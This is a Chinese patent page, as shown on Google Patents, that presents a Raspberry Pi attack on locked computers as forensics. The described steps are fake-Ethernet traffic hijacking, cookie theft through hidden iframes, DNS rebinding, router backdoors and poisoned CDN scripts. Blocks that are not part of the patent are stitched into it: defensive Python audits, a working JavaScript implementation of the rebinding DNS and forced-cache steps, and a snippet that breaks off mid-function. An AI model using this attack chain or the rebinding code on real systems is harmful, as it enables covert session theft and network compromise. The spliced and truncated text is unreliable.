CN107819862A - Rapid electronic forensics method, device and electronic device based on Raspberry Pi - Google Patents


Info

Publication number: CN107819862A
Authority: CN (China)
Prior art keywords: target system, information, routing information, raspberry, suspect
Legal status: Pending
Application number: CN201711134861.9A
Other languages: Chinese (zh)
Inventors: 章叶军, 范渊
Current assignee: DBAPPSecurity Co Ltd
Original assignee: DBAPPSecurity Co Ltd
Application filed by DBAPPSecurity Co Ltd
Priority to CN201711134861.9A
Publication of CN107819862A

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00 Network arrangements or protocols for supporting network services or applications
    • H04L67/01 Protocols
    • H04L67/02 Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00 Network arrangements or protocols for supporting network services or applications
    • H04L67/50 Network services
    • H04L67/535 Tracking the activity of the user

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Computing Systems (AREA)
  • Management, Administration, Business Operations System, And Electronic Commerce (AREA)

Abstract

The invention provides a Raspberry Pi based rapid electronic forensics method, device and electronic device. The method comprises: hijacking the network connection traffic of a target system that is in a screen-locked state; stealing the cookie information and routing information of the target system based on the network connection traffic; and, according to the cookie information and routing information, carrying out a rebinding attack on the target system in outbound mode to obtain target information. In the method of the invention the start-up password of the target system does not need to be cracked; instead, by plugging the Raspberry Pi into the suspect's computer, the Raspberry Pi can hijack the network connection traffic of the suspect's computer, then steal the cookie information and routing information of the suspect's computer and carry out a rebinding attack on it, and thereby obtain information related to the suspect's crime. The electronic forensics process is simple and fast, provides effective support for the case-solving work of forensic personnel, and alleviates the technical problem that existing electronic forensics methods are time-consuming and inefficient.

Description

Rapid electronic forensics method, device and electronic device based on Raspberry Pi
Technical field
The present invention relates to the technical field of electronic forensics, and in particular to a Raspberry Pi based rapid electronic forensics method, device and electronic device.
Background technology
In some cases, public security special investigation teams need to quickly obtain the internet records and session information on a suspect's locked computer. For example, if the suspect has just sent an important document to his organisation by e-mail, the team members need to learn the content of the e-mail and the organisation's e-mail address in time.
At present, when the special investigation team obtains information on a suspect's locked computer, it must first crack the computer password. On Windows systems this can be done by creating an administrator account in safe mode, or by removing the password with a PE system; Apple systems can be booted into recovery mode to change the password. Then specialised forensic tools (for example UrlViewer, a classified-information inspection and electronic forensics aid) are used to obtain the suspect's internet records.
For special investigation and criminal investigation cases, time is what matters most, and traditional electronic forensics methods require a certain amount of time. If the suspect has some counter-investigation awareness he can also set up a complex password protection mechanism, which undoubtedly creates no small resistance to the investigation work.
In summary, traditional electronic forensics methods first need to crack the computer password and then use professional forensic tools to carry out electronic forensics, which is time-consuming and inefficient.
Summary of the invention
In view of this, the object of the present invention is to provide a Raspberry Pi based rapid electronic forensics method, device and electronic device, so as to alleviate the technical problem that existing electronic forensics methods are time-consuming and inefficient.
In a first aspect, an embodiment of the invention provides a Raspberry Pi based rapid electronic forensics method, applied on the Raspberry Pi side, the method comprising:
hijacking the network connection traffic of a target system that is in a screen-locked state, wherein the target system is the suspect's system;
stealing the cookie information and routing information of the target system based on the network connection traffic;
according to the cookie information and the routing information, carrying out a rebinding attack on the target system in outbound mode to obtain target information, and sending the target information to the terminal of the forensic personnel, wherein the target information is information related to the suspect's crime.
With reference to the first aspect, an embodiment of the invention provides a first possible implementation of the first aspect, wherein, after the rebinding attack has been carried out in outbound mode according to the cookie information and the routing information to obtain the target information, the method further comprises:
forcibly caching a backdoor in the network environment of the target system, so that the forensic personnel obtain the target information by accessing the backdoor.
With reference to the first aspect, an embodiment of the invention provides a second possible implementation of the first aspect, wherein hijacking the network connection traffic of the target system in the screen-locked state comprises:
accessing the target system according to an access operation of the forensic personnel, disguised as a fake Ethernet;
connecting the target system to the fake Ethernet, so as to hijack the network connection traffic of the target system.
With reference to the first aspect, an embodiment of the invention provides a third possible implementation of the first aspect, wherein stealing the cookie information and routing information of the target system based on the network connection traffic comprises:
after the target system sends an access request through a browser, monitoring the access request and the access response to the access request based on the network connection traffic;
obtaining the cookie information and routing information of the target system based on the access request and the access response,
wherein the cookie information comprises the ID information, password information and web page information of the target system when it performs the access; the routing information is the routing path traversed by the target system when it performs the access, and the routing path comprises at least one of the following: internal IP, node server, label.
With reference to the first aspect, an embodiment of the invention provides a fourth possible implementation of the first aspect, wherein forcibly caching the backdoor in the network environment of the target system so that the forensic personnel obtain the target information by accessing the backdoor comprises:
hijacking the LAN routing information connected to the target system;
determining a target server according to the LAN routing information, wherein the target server is the server corresponding to target routing information in the LAN routing information, and the target routing information is the best-performing entry in the LAN routing information;
forcibly caching the backdoor on the target server, so as to generate a permanent rebinding attack;
obtaining the target information based on the permanent rebinding attack.
In a second aspect, an embodiment of the invention further provides a Raspberry Pi based rapid electronic forensics device, applied on the Raspberry Pi side, the device comprising:
a hijacking module, for hijacking the network connection traffic of a target system that is in a screen-locked state, wherein the target system is the suspect's system;
a stealing module, for stealing the cookie information and routing information of the target system based on the network connection traffic;
a rebinding attack module, for carrying out a rebinding attack on the target system in outbound mode according to the cookie information and the routing information to obtain target information, and sending the target information to the terminal of the forensic personnel, wherein the target information is information related to the suspect's crime.
With reference to the second aspect, an embodiment of the invention provides a first possible implementation of the second aspect, wherein the device further comprises:
a backdoor cache module, for forcibly caching a backdoor in the network environment of the target system, so that the forensic personnel obtain the target information by accessing the backdoor.
With reference to the second aspect, an embodiment of the invention provides a second possible implementation of the second aspect, wherein the hijacking module comprises:
a first access unit, for accessing the target system according to an access operation of the forensic personnel, disguised as a fake Ethernet;
a second access unit, for connecting the target system to the fake Ethernet, so as to hijack the network connection traffic of the target system.
With reference to the second aspect, an embodiment of the invention provides a third possible implementation of the second aspect, wherein the stealing module comprises:
a monitoring unit, for monitoring, after the target system sends an access request through a browser, the access request and the access response to it based on the network connection traffic;
a first acquisition unit, for obtaining the cookie information and routing information of the target system based on the access request and the access response, wherein the cookie information comprises the ID information, password information and web page information of the target system when it performs the access; the routing information is the routing path traversed by the target system when it performs the access, and the routing path comprises at least one of the following: internal IP, node server, label.
In a third aspect, an embodiment of the invention further provides an electronic device comprising a memory and a processor, the memory storing a computer program that can run on the processor, and the processor implementing the steps of the method of the first aspect when executing the computer program.
Embodiments of the invention bring the following beneficial effects. An embodiment of the invention provides a Raspberry Pi based rapid electronic forensics method, device and electronic device; the method is applied on the Raspberry Pi side and comprises: hijacking the network connection traffic of a target system that is in a screen-locked state, wherein the target system is the suspect's system; stealing the cookie information and routing information of the target system based on the network connection traffic; according to the cookie information and routing information, carrying out a rebinding attack on the target system in outbound mode to obtain target information, and sending the target information to the terminal of the forensic personnel, wherein the target information is information related to the suspect's crime.
When traditional electronic forensics methods carry out electronic forensics, the computer password must first be cracked and then professional forensic tools are used; cracking the computer password takes a long time and the efficiency of electronic forensics is low. Compared with traditional electronic forensics methods, in the Raspberry Pi based rapid electronic forensics method of the invention the Raspberry Pi steals the cookie information and routing information of the target system by hijacking the network connection traffic of the target system in the screen-locked state, then carries out a rebinding attack on the target system in outbound mode according to the cookie information and routing information to obtain the target information, and sends the target information to the terminal of the forensic personnel. In this method the start-up password of the target system (i.e. the suspect's computer) does not need to be cracked; instead, by plugging the Raspberry Pi into the suspect's computer, the Raspberry Pi can hijack the network connection traffic of the suspect's computer, then steal its cookie information and routing information, and finally carry out a rebinding attack on it to obtain information related to the suspect's crime. The electronic forensics process is simple and fast, provides effective support for the case-solving work of forensic personnel, and alleviates the technical problem that existing electronic forensics methods are time-consuming and inefficient.
Other features and advantages of the invention will be set out in the following description and will in part become apparent from the description, or be learned by practising the invention. The objects and other advantages of the invention are realised and obtained by the structures specifically pointed out in the description, the claims and the accompanying drawings.
To make the above objects, features and advantages of the invention more apparent, preferred embodiments are described in detail below in conjunction with the accompanying drawings.
Brief description of the drawings
In order to explain the specific embodiments of the invention or the technical solutions of the prior art more clearly, the drawings needed for the description of the specific embodiments or of the prior art are briefly introduced below. Obviously, the drawings described below are some embodiments of the invention, and a person of ordinary skill in the art can obtain other drawings from them without creative effort.
Fig. 1 is a flow chart of a Raspberry Pi based rapid electronic forensics method provided in an embodiment of the invention;
Fig. 2 is a flow chart of the method of hijacking the network connection traffic of a target system in the screen-locked state, provided in an embodiment of the invention;
Fig. 3 is a flow chart of the method of stealing the cookie information and routing information of the target system based on the network connection traffic, provided in an embodiment of the invention;
Fig. 4 is a flow chart of the method of forcibly caching a backdoor in the network environment of the target system so that the forensic personnel obtain the target information by accessing the backdoor, provided in an embodiment of the invention;
Fig. 5 is a structural block diagram of a Raspberry Pi based rapid electronic forensics device provided in an embodiment of the invention;
Fig. 6 is a schematic diagram of an electronic device provided in an embodiment of the invention.
Reference signs:
20 - hijacking module; 21 - stealing module; 22 - rebinding attack module.
Embodiment
To make the objects, technical solutions and advantages of the embodiments of the invention clearer, the technical solutions of the invention are described clearly and completely below in conjunction with the drawings. Obviously, the described embodiments are some, rather than all, of the embodiments of the invention. All other embodiments obtained by a person of ordinary skill in the art on the basis of the embodiments of the invention without creative effort fall within the scope of protection of the invention.
To facilitate understanding of the present embodiment, a Raspberry Pi based rapid electronic forensics method disclosed in an embodiment of the invention is first described in detail.
Embodiment one:
A Raspberry Pi based rapid electronic forensics method, applied on the Raspberry Pi side; with reference to Fig. 1, the method comprises:
S102, hijacking the network connection traffic of a target system that is in a screen-locked state, wherein the target system is the suspect's system;
In the embodiment of the invention, the executing entity of the method is the Raspberry Pi; since this Raspberry Pi is used for forensics, it may be called the forensic Raspberry Pi.
The Raspberry Pi and electronic forensics are first briefly introduced. The Raspberry Pi is an ARM-based microcomputer board that uses an SD/MicroSD card as its storage disk; the board carries 1/2/4 USB ports and a 10/100 Ethernet port, together with a wireless interface module and a Bluetooth module, all integrated on a board only slightly larger than a credit card, and it provides all the basic functions of a PC.
Electronic forensics refers to the process of acquiring, preserving, analysing and presenting evidence of crimes such as computer intrusion, sabotage, fraud and attacks, using computer hardware technology in a manner that conforms to legal norms. Technically, computer crime forensics is a process of scanning and cracking the suspect's system and reconstructing the criminal event. Specifically, the computer is regarded as a crime scene, and advanced identification techniques are used to dissect the computer crime behaviour and search for the criminal and the evidence of the crime.
Specifically, the target system is the suspect's system, in particular the suspect's computer. The screen-locked state means that the suspect's computer is powered on, but because the suspect has set a start-up password the computer cannot be operated; this is the screen-locked state. Of course, the method in the embodiment of the invention also applies to a suspect's computer that is not in the screen-locked state; the embodiment of the invention does not particularly limit this.
In addition, the process of hijacking the network connection traffic is described in detail below and is not repeated here.
S104, stealing the cookie information and routing information of the target system based on the network connection traffic;
After the network connection traffic of the target system has been hijacked, the cookie information and routing information stored in the browser of the target system can be stolen based on that traffic. Specifically, the Raspberry Pi holds a website pool that contains the websites the forensic personnel are interested in. For example, if the forensic personnel want to obtain the suspect system's information on websites such as Baidu, Facebook and Taobao, those websites are included in the pool. In practice the pool usually comprises the 1,000,000 top-ranked websites of www.alexa.cn; the embodiment of the invention does not particularly limit this.
Once the suspect's system has logged in to websites such as Baidu, Facebook and Taobao, the cookie information and routing information of the suspect's system on those websites can be acquired after the Raspberry Pi is plugged into the suspect's computer.
Specifically, "the suspect's system has logged in to Baidu, Facebook and Taobao" means: at an earlier moment the suspect logged in to these three websites through the browser, and at a later moment the suspect closed the browser without clicking log out. In this case the suspect's computer is still in the logged-in state on these three websites, so the cookie information and routing information of the suspect's system on these websites can still be obtained.
That is, after the suspect's computer has logged in to major websites, if the suspect's computer has not logged out of them but has merely closed the browser, the Raspberry Pi can still obtain the cookie information and routing information of the suspect's computer on those websites.
S106, according to the cookie information and routing information, carrying out a rebinding attack on the target system in outbound mode to obtain target information, and sending the target information to the terminal of the forensic personnel, wherein the target information is information related to the suspect's crime.
After the cookie information and routing information have been obtained, the Raspberry Pi can carry out a rebinding attack on the target system in outbound mode, thereby acquire the target information, and send it to the terminal of the forensic personnel. Specifically, the rebinding attack may be a WebSocket rebinding attack or a DNS rebinding attack.
The above describes the process of carrying out electronic forensics on the suspect's computer for the first time. After the first electronic forensics is complete, the Raspberry Pi can also perform a further operation that makes it convenient to carry out electronic forensics on the suspect's computer again at a later stage.
Optionally, after the rebinding attack has been carried out in outbound mode according to the cookie information and routing information to obtain the target information, the method further comprises:
forcibly caching a backdoor in the network environment of the target system, so that the forensic personnel obtain the target information by accessing the backdoor.
After the target information has been obtained, a backdoor is further forcibly cached in the network environment of the target system (i.e. the suspect's computer), so that when the forensic personnel later carry out electronic forensics on the suspect's system again they can obtain the target information directly by accessing the backdoor, without plugging in the Raspberry Pi again; this makes later electronic forensics work more convenient and faster.
That is, the cached backdoor involves thousands of domain names and common JavaScript CDN links, and uses the user's cookies to establish remote HTTP GET or POST control connections to backend domain names; the target system does not need to be unlocked, and the backdoor remains effective after the Raspberry Pi is removed.
The above has given an overall introduction to the Raspberry Pi based rapid electronic forensics method; the specific content involved is described in detail below.
Optionally, with reference to Fig. 2, hijacking the network connection traffic of a target system in the screen-locked state comprises:
S201, accessing the target system according to an access operation of the forensic personnel, disguised as a fake Ethernet;
The Raspberry Pi supports all Windows and Mac systems. Once plugged into the computer it emulates a newly added fake Ethernet connection, and even if the suspect uses WiFi, the suspect's system can likewise be made to access the disguised fake Ethernet with priority. Using a man-in-the-middle approach, the Raspberry Pi can hijack and monitor all of the suspect's network traffic, steal any cookies and sessions stored in the browser, and then send them to the server control end (the terminal of the forensic personnel).
S202, connecting the target system to the fake Ethernet, so as to hijack the network connection traffic of the target system.
Specifically, the forensic personnel plug the Raspberry Pi into the password-protected, screen-locked suspect system; the Raspberry Pi emulates and disguises itself as a newly added fake Ethernet device, and by default, even in the password-protected screen-locked state, Windows, OS X and Linux systems recognise the fake network connection and send a DHCP request.
The Raspberry Pi answers the DHCP request and provides a constructed address set, from 0.0.0.0 to 255.255.255.255, combined with random IP addresses on the same subnet as the Raspberry Pi device. Normally, when the suspect's system is already connected to an existing network, the addition of a further network connection is treated by the suspect's system as a low-priority network and the original gateway continues to be used. However, because the whole of the "Internet traffic" is presented as "LAN traffic", any routing-table, gateway-priority or network-interface service-order setting is bypassed and disregarded, so by changing the gateway address of the original network connection the Raspberry Pi draws the traffic to itself and thereby hijacks all of the suspect system's network traffic.
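A defensive counterpart to the rogue-gateway step in S201 and S202, added here as an example and not part of the patent: a small Python audit that parses Linux `ip route show` output and flags the two symptoms the text describes, an on-link route on a new interface that claims the whole IPv4 space (the 0.0.0.0 to 255.255.255.255 offer) and a default route on an untrusted interface that outranks the real uplink. The interface names, the sample route lines and the `trusted_ifaces` policy are constructed assumptions.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample of `ip route show` (Linux) from a laptop whose real
# uplink is wlan0. usb0 stands for a hypothetical USB network gadget that
# answered DHCP with a 0.0.0.0 netmask, so the kernel installed a /0
# on-link route and a default route with a better (lower) metric.
SAMPLE_IP_ROUTE = """\
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
default dev usb0 proto kernel scope link src 1.0.0.3 metric 100
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.50 metric 600
"""


@dataclass(frozen=True)
class Route:
    destination: ipaddress.IPv4Network
    gateway: Optional[ipaddress.IPv4Address]  # None means on-link (no "via")
    interface: str
    metric: int


def parse_ip_route(text: str) -> List[Route]:
    """Parse `ip route show` lines into Route records."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        dest = (ipaddress.ip_network("0.0.0.0/0") if parts[0] == "default"
                else ipaddress.ip_network(parts[0], strict=False))
        gateway, iface, metric = None, "", 0
        for i, tok in enumerate(parts[:-1]):
            if tok == "via":
                gateway = ipaddress.ip_address(parts[i + 1])
            elif tok == "dev":
                iface = parts[i + 1]
            elif tok == "metric":
                metric = int(parts[i + 1])
        routes.append(Route(dest, gateway, iface, metric))
    return routes


def audit_routes(routes: List[Route], trusted_ifaces: Set[str],
                 min_onlink_prefixlen: int = 8) -> List[str]:
    """Return one finding per route that looks like a rogue-gateway takeover."""
    findings = []
    # Best (lowest) metric among default routes on interfaces we trust.
    trusted_default_metrics = [r.metric for r in routes
                               if r.destination.prefixlen == 0
                               and r.interface in trusted_ifaces]
    best_trusted = min(trusted_default_metrics, default=None)
    for r in routes:
        if r.interface in trusted_ifaces:
            continue
        # A link-scope route far wider than any real LAN: the whole Internet
        # is being presented as directly reachable on this interface.
        if r.gateway is None and r.destination.prefixlen < min_onlink_prefixlen:
            findings.append(
                f"{r.interface}: overbroad on-link route {r.destination} claims "
                f"{r.destination.num_addresses} addresses as directly reachable")
        # A default route on an interface we did not provision, especially
        # one whose metric beats the trusted uplink.
        if r.destination.prefixlen == 0:
            msg = f"{r.interface}: default route on untrusted interface"
            if best_trusted is not None and r.metric < best_trusted:
                msg += f" (metric {r.metric} beats trusted metric {best_trusted})"
            findings.append(msg)
    return findings


if __name__ == "__main__":
    for finding in audit_routes(parse_ip_route(SAMPLE_IP_ROUTE), {"wlan0", "eth0"}):
        print(finding)
```

On a real host the same audit would read `ip route show` periodically (or on a netlink route-change event) and alert when a finding appears while the session is locked; the policy knob is simply which interface names are allowed to carry a default route.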
Further, with reference to Fig. 3, stealing the cookie information and routing information of the target system based on the network connection traffic comprises:
S301, after the target system sends an access request through a browser, monitoring the access request and the access response to it based on the network connection traffic;
Specifically, as long as a browser is running on the target system, an open web page will generate various requests through AJAX or dynamic script frameworks (script/iframes); because the target system's network traffic is completely hijacked, the Raspberry Pi monitors all HTTP requests and responses and forwards that content to the Raspberry Pi's web service end (Node.js). Even if the DNS server points to another internal IP, the attack still works, because those internal DNS servers produce public IP addresses for cached domain names, and those IP addresses are hijacked by the Raspberry Pi.
S302, obtaining the cookie information and routing information of the target system based on the access request and the access response, wherein the cookie information comprises the ID information, password information and web page information of the target system when it performs the access; the routing information is the routing path traversed by the target system when it performs the access, and the routing path comprises at least one of the following: internal IP, node server, label.
Specifically, when the Node web server receives a request, the Raspberry Pi can respond with HTML or JavaScript (many websites load HTML or JS in background requests).
Then the HTML/JS-agnostic page generates many hidden iframes, each of which includes a different website from the Alexa top 1,000,000.
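Set-Cookie attributes are what decide whether the hidden-iframe harvesting in S301 and S302 yields a usable session cookie: a cookie without Secure is sent on the plaintext http:// requests the hijacked gateway can induce, and one without SameSite is sent from a cross-site iframe. The following Python audit of Set-Cookie headers is an added example, not part of the patent; the header strings are constructed.

```python
from typing import Dict, List, Tuple

# Constructed Set-Cookie headers: a weak session cookie of the kind the
# hidden-iframe harvesting picks up, and a hardened one.
WEAK_SET_COOKIE = "sid=8f2a1c; Path=/; Expires=Fri, 01 Jan 2027 00:00:00 GMT"
HARDENED_SET_COOKIE = "__Host-sid=8f2a1c; Path=/; Secure; HttpOnly; SameSite=Lax"


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()  # attribute names are case-insensitive
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header: str) -> List[str]:
    """List the ways this cookie is exposed to a plaintext MITM and cross-site iframes."""
    name, _value, attrs = parse_set_cookie(header)
    issues = []
    if "secure" not in attrs:
        issues.append("missing Secure: the browser sends it on plaintext http:// requests, "
                      "so an injected http:// iframe to this site leaks it")
    if "httponly" not in attrs:
        issues.append("missing HttpOnly: readable by any script running in the origin")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        issues.append("SameSite not explicitly Lax/Strict: sent on requests "
                      "initiated from other sites, including hidden iframes")
    if name.startswith("__Host-"):
        # The __Host- prefix is only honoured with Secure, Path=/ and no Domain.
        if "secure" not in attrs or attrs.get("path") != "/" or "domain" in attrs:
            issues.append("__Host- prefix used but its requirements "
                          "(Secure, Path=/, no Domain) are not met")
    return issues


if __name__ == "__main__":
    for label, header in (("weak", WEAK_SET_COOKIE), ("hardened", HARDENED_SET_COOKIE)):
        print(label, audit_set_cookie(header) or "ok")
```

Run against a site's real Set-Cookie headers, an empty list for the session cookie means the plaintext-iframe harvest described above gets nothing usable from that site, even if the browser is coaxed into visiting it over http://.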
Further, with reference to figure 4, forcibly caching a backdoor in the network environment of the target system so that the forensic personnel obtain the target information by accessing the backdoor includes:
S401: hijacking the LAN routing information connected to the target system;
Specifically, the Raspberry Pi can hijack the LAN routing information of the current network based on the network connection traffic.
S402: determining a target server according to the LAN routing information, wherein the target server is the server corresponding to the target routing information in the LAN routing information, and the target routing information is the best-performing information in the LAN routing information;
After the LAN routing information is obtained, the best-performing routing information in it is determined as the target routing information, and the server corresponding to the target routing information is used as the target server (in the example below this is the internal router at 192.168.0.1).
S403: forcibly caching a backdoor on the target server, so as to generate a persistent rebinding attack;
Specifically, the Raspberry Pi forces a backdoor into the browser cache for a particular host (the target server) by appending ".ip.raspberry" to the target server's IP address, e.g. 192.168.0.1.ip.raspberry, which yields a persistent DNS rebinding attack. When the Raspberry Pi is acting as the DNS server (the suspect's system uses a public DNS server), the Raspberry Pi answers with a temporary, special IP (1.0.0.1), meaning that at that moment any request for the name reaches the Raspberry Pi's web server. If the DNS server is set to the internal network (e.g. 192.168.0.x), a specially constructed request for 1.0.0.1.pin.ip.raspberry is sent, which signals the forensic personnel's special DNS server (on the public Internet) to return that interim address, for a few seconds, for any [ip.address].ip.raspberry name. The Raspberry Pi then quickly plants a backdoor at http://192.168.0.1.ip.raspberry/raspberry; because the name currently points at 1.0.0.1, i.e. the Raspberry Pi, the backdoor is actually served from the Raspberry Pi device;
DNS pinning and DNS rebinding protections are bypassed by requesting the Alexa top 1,000,000 websites in the background, which exhausts the browser's DNS pinning table. After that, DNS rebinding is no longer needed, so the attack can persist for a very long time;
S404: obtaining the target information based on the persistent rebinding attack.
Specifically, the backdoor is force-cached for http://192.168.0.1.ip.raspberry/raspberry. Once the pin window has passed, any request to 192.168.0.1.ip.raspberry hits the unpinned name and the public DNS server answers with the real internal address, so resolution points directly at 192.168.0.1;
This means that if the 192.168.0.1.ip.raspberry backdoor is remotely loaded in an iframe, the Raspberry Pi's backdoor page now shares its origin with the host (the target server, i.e. the internal router), because the browser keys the origin on the host name rather than on the address it currently resolves to. The backdoor can therefore perform AJAX GET/POST requests against any other page of the internal router, achieving full remote control of the internal router.
In addition, the Raspberry Pi replaces thousands of common CDN-hosted JavaScript files, such as those on the Google and jQuery CDNs, with backdoored versions. If a website or domain loads one of the poisoned CDN JavaScript files, then, with the right code cooperating with the backdoor, the forensic personnel gain intrusion access;
Because a backdoor is left behind for every cached website domain, even if the suspect is not currently visiting any of those domains, the forensic personnel can still remotely force the back-end browser to perform same-origin requests (AJAX GET/POST);
The backdoor is triggered whenever the suspect visits a website that loads the poisoned HTTP or CDN JavaScript from cache.
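The following is an added worked example, not code from the patent or from PoisonTap (the open-source tool the cited FreeBuf article describes), showing the DNS answer policy that steps S401 to S404 depend on, written as pure functions so it runs offline. Names under the attacker-controlled zone embed an IPv4 address; a query for 1.0.0.1.pin.ip.raspberry opens a short window during which every <ip>.ip.raspberry name answers with the interim address 1.0.0.1, and after the window the same name answers with the embedded internal address. It also builds the far-future cache headers on the forced-cache response served during the window. The zone name ip.raspberry, the interim address 1.0.0.1 and the /raspberry path are the patent's own placeholders; the 5-second window length, the function names and the header values are assumptions. One practical check before reusing the placeholders: 1.0.0.1 has been a public Cloudflare resolver address since 2018, so a current deployment could not treat it as a private interim address.

```javascript
'use strict';
// Added example: DNS answer policy behind the "persistent rebinding" of S403/S404.
// Zone, interim address and path are the patent's placeholders; the window length is assumed.
const ZONE = 'ip.raspberry';
const INTERIM_IP = '1.0.0.1';      // the device itself listens here during the window
const PIN_WINDOW_MS = 5000;        // "a few seconds" in the text; 5 s is an assumption
const BACKDOOR_PATH = '/raspberry';

const IPV4 = /^(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}$/;

// "<ip>.ip.raspberry" -> { ip, pin: false }; "<ip>.pin.ip.raspberry" -> { ip, pin: true };
// anything else (other zones, malformed octets) -> null, i.e. NXDOMAIN.
function parseRebindName(qname) {
  const name = String(qname).toLowerCase().replace(/\.$/, '');
  const pinSuffix = '.pin.' + ZONE;
  const plainSuffix = '.' + ZONE;
  let ip;
  let pin;
  if (name.endsWith(pinSuffix)) {
    ip = name.slice(0, -pinSuffix.length);
    pin = true;
  } else if (name.endsWith(plainSuffix)) {
    ip = name.slice(0, -plainSuffix.length);
    pin = false;
  } else {
    return null;
  }
  return IPV4.test(ip) ? { ip, pin } : null;
}

// Resolver state: epoch-ms time at which the current pin window closes (0 = none open).
function createResolver() {
  return { pinUntil: 0 };
}

// Answer one A query at time `now` (epoch ms). Returns an IPv4 string, or null.
// The answer is meant to carry TTL 0 so the browser re-asks after the window
// instead of caching 1.0.0.1.
function resolveA(state, qname, now) {
  const parsed = parseRebindName(qname);
  if (parsed === null) return null;
  if (parsed.pin) {
    // Only "1.0.0.1.pin.<zone>" may open a window; any other pin name is refused.
    if (parsed.ip !== INTERIM_IP) return null;
    state.pinUntil = now + PIN_WINDOW_MS;
    return INTERIM_IP;
  }
  // Inside the window the name points at the device; afterwards it "rebinds" to the
  // embedded internal address and stays there, which is what keeps the backdoor usable.
  return now < state.pinUntil ? INTERIM_IP : parsed.ip;
}

// The forced-cache half of S403: headers on the response the device serves for
// http://192.168.0.1.ip.raspberry/raspberry while the name still resolves to 1.0.0.1.
// A far-future freshness lifetime makes the browser keep the body for that origin.
function forcedCacheHeaders(now) {
  const oneYear = 365 * 24 * 3600;
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Cache-Control': 'public, max-age=' + oneYear + ', immutable',
    'Expires': new Date(now + oneYear * 1000).toUTCString(),
  };
}

// Walk the sequence described in the text on a constructed clock (epoch ms).
function demo() {
  const state = createResolver();
  const target = '192.168.0.1.' + ZONE;
  return {
    before: resolveA(state, target, 1000),              // embedded address: 192.168.0.1
    pin: resolveA(state, '1.0.0.1.pin.' + ZONE, 1000),  // window opens: 1.0.0.1
    during: resolveA(state, target, 2000),              // device serves the backdoor: 1.0.0.1
    after: resolveA(state, target, 7000),               // rebound: 192.168.0.1
    url: 'http://' + target + BACKDOOR_PATH,
  };
}
```

The pin window is the only moment at which the device's own content is associated with the target name; everything afterwards relies on the browser's HTTP cache rather than on DNS, which is why the text can say that rebinding is no longer needed once the pinning table has been exhausted.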
The Raspberry Pi based rapid electronic forensics method in the embodiment of the present invention has the following advantages:
It gets past the suspect's locked computer in a short time (about 30 seconds) without unlocking it, obtains the session information the suspect left on web pages, accesses the pages the suspect browsed, and keeps the backdoor permanently effective; the portable, compact Raspberry Pi single-board microcomputer performs this whole series of cracking tasks, gaining valuable time for special investigation work.
Embodiment two:
A Raspberry Pi based rapid electronic forensics device, applied at the Raspberry Pi end; with reference to figure 5, the device includes:
A hijacking module 20 for hijacking the network connection traffic of a target system in the screen-locked state, wherein the target system is the suspect's system;
A stealing module 21 for stealing the cookie information and routing information of the target system based on the network connection traffic;
A rebinding attack module 22 for performing, according to the cookie information and routing information, a rebinding attack on the target system by outbound means to obtain target information, and sending the target information to the forensic personnel's terminal, wherein the target information is information related to the suspect's crime.
In the Raspberry Pi based rapid electronic forensics device of the present invention, the Raspberry Pi steals the cookie information and routing information of the target system by hijacking its network connection traffic while it is in the screen-locked state, then performs a rebinding attack on the target system by outbound means according to the cookie information and routing information to obtain the target information, and sends the target information to the forensic personnel's terminal. In this device there is no need to crack the startup password of the target system (i.e. the suspect's computer): once the Raspberry Pi is plugged into the suspect's computer it can hijack the computer's network connection traffic, steal the computer's cookie information and routing information, and finally perform a rebinding attack on the suspect's computer to obtain information related to the suspect's crime. This electronic forensics process is simple and fast, provides effective support for the forensic personnel's case-solving work, and alleviates the technical problem that existing electronic forensics methods are time-consuming and inefficient.
Optionally, the device further includes:
A backdoor caching module for forcibly caching a backdoor in the network environment of the target system, so that the forensic personnel obtain the target information by accessing the backdoor.
Optionally, the hijacking module includes:
A first access unit for accessing the target system according to an access operation of the forensic personnel, disguised as a fake Ethernet device;
A second access unit for connecting the target system to the fake Ethernet, so as to hijack the network connection traffic of the target system.
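The following is an added example, not the patent's or PoisonTap's code, showing why a fake Ethernet device captures the host's traffic even though the host already has a working, higher-priority Wi-Fi connection. The patent does not say how the hijack is achieved; the mechanism assumed here is PoisonTap's, in which the DHCP lease handed to the host carries classless static routes (DHCP option 121) for 0.0.0.0/1 and 128.0.0.0/1 via the device. Neither is a default route, so interface metric never comes into play: longest-prefix matching simply prefers a /1 over the real /0 default on Wi-Fi, while on-link /24 routes stay more specific and keep working. The routing table, addresses, interface names and metrics below are constructed.

```javascript
'use strict';
// Added example: longest-prefix-match route selection showing why a USB Ethernet
// gadget's /1 routes (PoisonTap's trick; assumed, not stated in the patent) beat a
// better-metric Wi-Fi default route. All addresses and metrics are constructed.

function ipToInt(ip) {
  const parts = String(ip).split('.').map(Number);
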